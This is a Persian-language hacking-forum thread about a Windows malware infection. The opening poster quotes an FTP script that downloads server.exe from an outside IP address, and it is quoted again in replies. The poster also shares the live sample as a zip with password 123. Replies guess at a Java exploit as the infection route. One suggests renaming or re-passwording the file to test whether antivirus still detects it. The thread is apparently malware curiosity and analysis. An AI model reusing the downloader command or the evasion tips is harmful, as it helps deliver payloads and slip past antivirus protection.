نمایش نتایج: از شماره 1 تا 12 , از مجموع 12

موضوع: یک ویروس....

  1. #1
    تاریخ عضویت
    Dec 2005
    محل سکونت
    اصفهان
    نوشته ها
    4,931
    تشکر از ارسال
    1,770
    Thanked 1,401 Times in 345 Posts

    یک ویروس....

    امروز روی سیستمم دیدم آنتی ویروس یه فایل host.exe را گرفت !
    برام جالب بود که این ویروسه یهو چطوری آنلاین اومده رو سیستمم... _ win7 (
    یه فایل هم به اسم svchost.exe توی یک فولدر رندوم اجرا کرده بود ! ( چینیهای تخم سگ )

    و یه سوتی ftp هم داده بود :

    open 59.175.153.49
    xzq
    [email protected]
    get server.exe c:\bootserver.exe
    bye

    ---
    پسورد فایل : 123
    فایل های پیوست شده فایل های پیوست شده
    • نوع فایل: zip avirus.zip (606.0 کیلو بایت, 159 نمایش)

  2. 7کاربر از joker به علت ارسالش تشکر کردند.

    captain 8l4ck (01-22-2013),Delphi_7 (01-22-2013),Drosera|Cqq47 (01-22-2013),mafia1990 (01-23-2013),Mr.M4st3r (01-22-2013),r3d.w0rm (01-23-2013),shervin110 (01-22-2013)

  3. #2
    تاریخ عضویت
    Sep 2010
    نوشته ها
    170
    تشکر از ارسال
    280
    Thanked 220 Times in 84 Posts
    انتیت چیه؟

  4. #3
    تاریخ عضویت
    Aug 2008
    نوشته ها
    600
    تشکر از ارسال
    519
    Thanked 100 Times in 55 Posts
    اویرا اصلا اجازه دانلود نداد.
    صد سال ره مسجد و ميخانه بگيري
    عمرت به هدر رفته اگر دست نگيري

    بشنو از پير خرابات تو اين پند
    هر دست که دادي به همان دست بگيري...

  5. #4
    تاریخ عضویت
    Jun 2006
    محل سکونت
    Tehran
    نوشته ها
    1,450
    تشکر از ارسال
    847
    Thanked 581 Times in 181 Posts
    نقل قول نوشته اصلی توسط joker نمایش پست ها
    امروز روی سیستمم دیدم آنتی ویروس یه فایل host.exe را گرفت !
    برام جالب بود که این ویروسه یهو چطوری آنلاین اومده رو سیستمم... _ win7 (
    یه فایل هم به اسم svchost.exe توی یک فولدر رندوم اجرا کرده بود ! ( چینیهای تخم سگ )

    و یه سوتی ftp هم داده بود :

    open 59.175.153.49
    xzq
    [email protected]
    get server.exe c:\bootserver.exe
    bye

    ---
    پسورد فایل : 123
    احیانا جاوا نداری ؟

  6. کاربر زیر از Mormoroth به علت ارسالش ابراز تشکر کرد.

    joker (01-22-2013)

  7. #5
    تاریخ عضویت
    Feb 2007
    محل سکونت
    odnoklassniki
    نوشته ها
    1,141
    تشکر از ارسال
    784
    Thanked 228 Times in 117 Posts
    آنتی ویروسش شید هستش

    پس شید کجا بود جوکر؟خواب زمستانی؟

  8. #6
    تاریخ عضویت
    Jun 2006
    نوشته ها
    1,007
    تشکر از ارسال
    672
    Thanked 96 Times in 46 Posts
    نقل قول نوشته اصلی توسط Delphi_7 نمایش پست ها
    اویرا اصلا اجازه دانلود نداد.
    آویرا چطوری فایل zip شده ( با پسورد ! ) رو بدون داشتن پسورد اسکن کرد ؟ اونم قبل دانلود... ؟!

    =======
    خب الان دقیقا من متوجه نشدم جریان چیه یه ویروسی که آنتی ویروس ها توانایی شناختن و پاکسازیشو دادن ، گذاشتی که ما هم دوباره آنالیز کنیم یا یه درس عبرتی بشه واسه آینده ی ما ؟

  9. #7
    تاریخ عضویت
    Aug 2010
    نوشته ها
    163
    تشکر از ارسال
    57
    Thanked 101 Times in 71 Posts
    نقل قول نوشته اصلی توسط joker نمایش پست ها
    امروز روی سیستمم دیدم آنتی ویروس یه فایل host.exe را گرفت !
    برام جالب بود که این ویروسه یهو چطوری آنلاین اومده رو سیستمم... _ win7 (
    یه فایل هم به اسم svchost.exe توی یک فولدر رندوم اجرا کرده بود ! ( چینیهای تخم سگ )

    و یه سوتی ftp هم داده بود :

    open 59.175.153.49
    xzq
    [email protected]
    get server.exe c:\bootserver.exe
    bye

    ---
    پسورد فایل : 123
    این روش ارسال لوگ روی isp های ایران کار نیمیکنه و و این که چجوری امدی 100% با Active X اپلودش اجرا شده وارده سایتهایی که شده لوگها و سورس هاشو چک کن و وینت احتمالا 32 بیت هست uac هم بسته هست
    ویرایش توسط keylogger : 01-22-2013 در ساعت 04:13 PM

  10. #8
    تاریخ عضویت
    Dec 2005
    محل سکونت
    اصفهان
    نوشته ها
    4,931
    تشکر از ارسال
    1,770
    Thanked 1,401 Times in 345 Posts
    این روش ارسال لوگ روی isp های ایران کار نیمیکنه و و این که چجوری امدی 100% با Active X اپلودش اجرا شده وارده سایتهایی که شده لوگها و سورس هاشو چک کن و وینت احتمالا 32 بیت هست uac هم بسته هست
    آره uac هم درد ناچاري ديزيبله و 32 بيتي هم هست.

    نقل قول نوشته اصلی توسط member11316 نمایش پست ها
    آنتی ویروسش شید هستش
    پس شید کجا بود جوکر؟خواب زمستانی؟
    پس فكر كردي چي بود گرفتش
    جاوا jdk هم دارم ، احتمالش هست اين باگ آخريه جاوا باشه

    خب الان دقیقا من متوجه نشدم جریان چیه یه ویروسی که آنتی ویروس ها توانایی شناختن و پاکسازیشو دادن ، گذاشتی که ما هم دوباره آنالیز کنیم یا یه درس عبرتی بشه واسه آینده ی ما ؟
    برام جالب بود روش آلوده كردنش ، چون كلا از IE استفاده نميكنم كه اكتيو ايكسي لود بشه.

  11. #9
    تاریخ عضویت
    Jun 2006
    محل سکونت
    Tehran
    نوشته ها
    1,450
    تشکر از ارسال
    847
    Thanked 581 Times in 181 Posts
    اکتیواکسی نیست و مولتی پلتفرمه . خیلی ناز و شیرین جاوا اپدیت 7 تا 10 رو اکسپلویت میکنه

  12. #10
    تاریخ عضویت
    Dec 2003
    محل سکونت
    TEHRAN
    نوشته ها
    3,034
    تشکر از ارسال
    353
    Thanked 339 Times in 86 Posts
    نود 32 نسخه 6 هم موقع دانلود گرفتش !
    چطوری با وجود پسورد قبل از باز کردن فايل ، آنتی ويروس محتويات فايل رو اسکن ميکنه ؟
    2013/01/24 04:08:06 ب.ظ Real-time file system protection file C:\DOCUME~1\DEAR-U~1\LOCALS~1\Temp\XMRXhnkS.zip.part Win32/Bagle.gen.zip worm cleaned by deleting - quarantined COMPUTER1\Dear-User Event occurred on a file modified by the application: C:\Program Files\Mozilla Firefox\firefox.exe.

  13. #11
    تاریخ عضویت
    Mar 2005
    نوشته ها
    1,444
    تشکر از ارسال
    738
    Thanked 224 Times in 98 Posts
    من فکر می کنیم url رو جز malicious url هاست و برای همون وقتی از این url فایل دانلود بشه . فایل رو ویروس شناسایی می کنه .
    می خواین فایل رو در یک سایت دیگه آپلود کنید تا ببینید باز هم میشناسه یا نه !!
    My Crime Is My Advisory

    Hacking Is The Best But Security Is The First

    My Crime Is That Of Curiosity

    هميشه راهي براي نفوذ است و هيچ سيستمي به طور مطلق امن نيست. بلكه بايستي آن راه نفوذ را كشف كرد .هنر هك هم در همين نكته متبلور ميشود

    Best Secure Hosting

    قبل پست دادن اینو بخون

  14. #12
    تاریخ عضویت
    May 2009
    محل سکونت
    سنندج
    نوشته ها
    1,126
    تشکر از ارسال
    812
    Thanked 812 Times in 317 Posts
    من nod32 ندارم کاسپرم اما یکی اینکه یک جا دیگه اپلود کن باز اگه گیر داد اسم فایل رو عوض کن باز اگه گیر داد شاید نود میاد پسورد ها رو 123 یا 123456 رو چک میکنه که کمی غیر ممکنه عوضش کن به یک پسورد بهتر

    حالا باحال این میشه باز تشخیص بده :دی
    ...

 

 

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •